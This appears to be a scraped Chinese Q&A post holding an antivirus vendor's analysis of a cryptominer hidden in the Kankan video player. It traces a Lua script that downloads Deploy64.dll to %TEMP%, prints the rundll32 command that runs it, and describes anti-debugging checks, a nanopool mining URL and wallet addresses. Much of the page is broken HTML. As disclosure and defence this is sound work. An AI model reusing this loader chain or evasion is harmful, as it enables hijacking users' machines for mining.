class=&visible&&/rbc/arbrowse&/span&&span class=&invisible&&rlink_v2.9.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/dc_arbrowserlink_v2.3.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/dc_arbro&/span&&span class=&invisible&&wserlink_v2.3.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/arbrowserlinkq_v1.6.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/arbrowse&/span&&span class=&invisible&&rlinkq_v1.6.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&http://***.&a href=&///?target=http%3A///rbc/dc_arbrowserlinkq_v1.2.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/dc_arbro&/span&&span class=&invisible&&wserlinkq_v1.2.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&&br&其中http://***.&a href=&///?target=http%3A///rbc/partnerdll_v2.11.xar& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/rbc/partnerd&/span&&span class=&invisible&&ll_v2.11.xar&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&是挖矿任务控制脚本，md5为8EFB8113706CBFF1EBB8CF5；解包后只有一个脚本onload.lua，主要功能是根据配置参数configurl下载deploy64.dll到%TEMP%目录下并加载运行。而deploy64.dll正是挖矿的主体模块。&br&&br&&br&configurl配置的脚本内容如下：&br&&img src=&/8c3369eeadc0a6684f21_b.png& data-rawheight=&432& data-rawwidth=&737& class=&origin_image zh-lightbox-thumb& width=&737& data-original=&/8c3369eeadc0a6684f21_r.png&&&br&挖矿任务脚本配置的DLL下载地址&br&&br&里面配置了deploy.dll的3个下载地址caburl、caburl_without、caburl_withoutwithdll，其中caburl是编译了opencl的，caburl_without是没有编译opencl的，caburl_withoutwithdll是没有编译opencl但打包了OpenCl.dll的。但脚本中总是去下载caburl，最后调用rundll32.exe加载Deploy64.dll运行：&br&&img src=&/77d56c98a672451fcb08f1c54ad00682_b.png& data-rawheight=&213& data-rawwidth=&1015& class=&origin_image zh-lightbox-thumb& width=&1015& data-original=&/77d56c98a672451fcb08f1c54ad00682_r.png&&&br&脚本调用rundll32.exe加载&br&&br&&br&完整命令行如下：&br&c:\windows\system32\rundll32.exe “%TEMP%\Deploy64.dll” ,Control_RunDLL index_class_d=%d&br&其中参数index_class_d在taskschedule_v1.2.dat中的任务参数配置块中指定。&br&Deploy64.dll加载起来后就开始执行真正的挖矿代码了，是导致GPU使用率大增、电脑过热、C盘可用空间变小的真正元凶。&br&&br&&br&&br&&strong&Deploy64.dll分析&/strong&&br&Deploy64.dll加载后会创建2个线程：CSafeRT::MonitorThread和EthThread。其中CSafeRT::MonitorThread是监控线程，而EthThread是挖矿线程。&br&&br&&strong&CSafeRT::MonitorThread&/strong&&br&该线程会创建一个窗口，窗口类名为__deploy_CSafeRTImpl，窗口名称为__deploy_CSafeRTImpl_i_1_5，然后在窗口过程函数中检测调试器和枚举窗口，如果检测到被调试或有检测工具窗口存在则退出。&br&&img src=&/0befeb62cb03eeb071d7ad3bf1df2f8d_b.png& data-rawheight=&386& data-rawwidth=&904& class=&origin_image zh-lightbox-thumb& width=&904& data-original=&/0befeb62cb03eeb071d7ad3bf1df2f8d_r.png&&&br&检测到正在被调试则退出&br&&br&&br&&img src=&/ca38a13a8bb788ec4b1189_b.png& data-rawheight=&581& data-rawwidth=&574& class=&origin_image zh-lightbox-thumb& width=&574& data-original=&/ca38a13a8bb788ec4b1189_r.png&&&br&检测到以上窗口标题则退出&br&&br&&br&&br&&br&&strong&EthThread&/strong&&br&Ethread是执行挖矿的主体线程，首先下载挖矿配置文件http://***.&a href=&///?target=http%3A///deploy/dtask%25d_.ini& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/deploy/dtask&/span&&span class=&invisible&&%d_.ini&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&，其中%d由传入参数index_class_d指定，目前0-7有效。该配置文件内容如下：&br&&img src=&/9fe280b31ab_b.png& data-rawheight=&174& data-rawwidth=&648& class=&origin_image zh-lightbox-thumb& width=&648& data-original=&/9fe280b31ab_r.png&&&br&挖矿配置文件&br&&br&读取配置字段后使用AES128算法解密，得到p = “&a href=&///?target=http%3A//eth-asia1.nanopool.org%3A8888/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&http://eth-asia1.nanopool.org:8888&i class=&icon-external&&&/i&&/a&”；us = “0xd2AcF0DAc218A410e51;&br&0xEaABAF0384EE73bca43c2A698e240d64de09081b;&br&0x0af856fbEd6e93A01b3c4557D64edc99C5a5d46B;&br&0x669F588Fb94ceBFB6fB93bbd5dF2CFc;&br&0xedC148759dFdFfA3EEfF01Ea64B2aBff;&br&0xfE7c793eD4F16B6d05eC763Dc812E1;&br&0xc556dEfAe;&br&0xb1deAFbeA52;&br&0xa6238edc8c3bBD7E23AB6174DED92165;&br&0x9C3dc3Bc89a0f16B1CBc2bA8b3&br&0xFfB6faEF01AF7c1d762”&br&&br&&br&&br&&img src=&/0ade810fe221c6a245c3de40dbea7e11_b.png& data-rawheight=&641& data-rawwidth=&871& class=&origin_image zh-lightbox-thumb& width=&871& data-original=&/0ade810fe221c6a245c3de40dbea7e11_r.png&&&img src=&/76d730aeb3fa166bdb5250_b.png& data-rawheight=&153& data-rawwidth=&1035& class=&origin_image zh-lightbox-thumb& width=&1035& data-original=&/76d730aeb3fa166bdb5250_r.png&&&br&解密得到的挖矿参数&br&&br&&br&然后拼接得到 &a href=&///?target=http%3A//eth-asia1.nanopool.org%3A8888/0xFfB6faEF01AF7c1d762& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&eth-asia1.nanopool.org:8888&/span&&span class=&invisible&&/0xFfB6faEF01AF7c1d762&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&。&br&&br&&img src=&/a2c5d3ab498e067c29f17ed_b.png& data-rawheight=&294& data-rawwidth=&857& class=&origin_image zh-lightbox-thumb& width=&857& data-original=&/a2c5d3ab498e067c29f17ed_r.png&&&br&启动挖矿参数&br&&br&传的参数给自身进程，开始挖矿。其中参数-G指定使用GPU挖矿，参数-F指定矿场url。挖矿开始后会在用户目录下生成Ethash目录，其中的挖矿数据文件格式如下，单个文件大小超过1.5GB。同时造成用户电脑GPU占用率飙升，电脑发热增大等现象。&br&&br&&img src=&/abc652eaecfe0baaf2b02f_b.png& data-rawheight=&198& data-rawwidth=&621& class=&origin_image zh-lightbox-thumb& width=&621& data-original=&/abc652eaecfe0baaf2b02f_r.png&&&br&Deploy64.dll生成的挖矿文件&br&&br&&br&以上就是看看影音利用用户电脑运算资源进行挖矿的整个过程分析。由于看看影音本身属于正常软件，通常被各安全软件直接信任，从而导致这种恶意行为难以被发现。目前毒霸可以查杀该恶意行为。&br&&img src=&/4aecba623cf31ca6bc3d5ed_b.png& data-rawheight=&300& data-rawwidth=&571& class=&origin_image zh-lightbox-thumb& width=&571& data-original=&/4aecba623cf31ca6bc3d5ed_r.png&&&a href=&///?target=http%3A//www.duba.net/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&金山毒霸&i class=&icon-external&&&/i&&/a&拦截查杀挖矿病毒&br&&br&&img src=&/8bde9a65d26b1efda5f18_b.png& data-rawheight=&560& data-rawwidth=&800& class=&origin_image zh-lightbox-thumb& width=&800& data-original=&/8bde9a65d26b1efda5f18_r.png&&
毒霸清理挖矿数据文件
截止目前来看，只有毒霸能杀诶： 附带详细报告： ================================================================ 看看影音恶意挖矿详…
已有帐号？
无法登录？
社交帐号登录
111 人关注
175 条内容
1693 人关注
281 条内容
1790 人关注
357 条内容
960 人关注
341 条内容
27152 人关注
891 条内容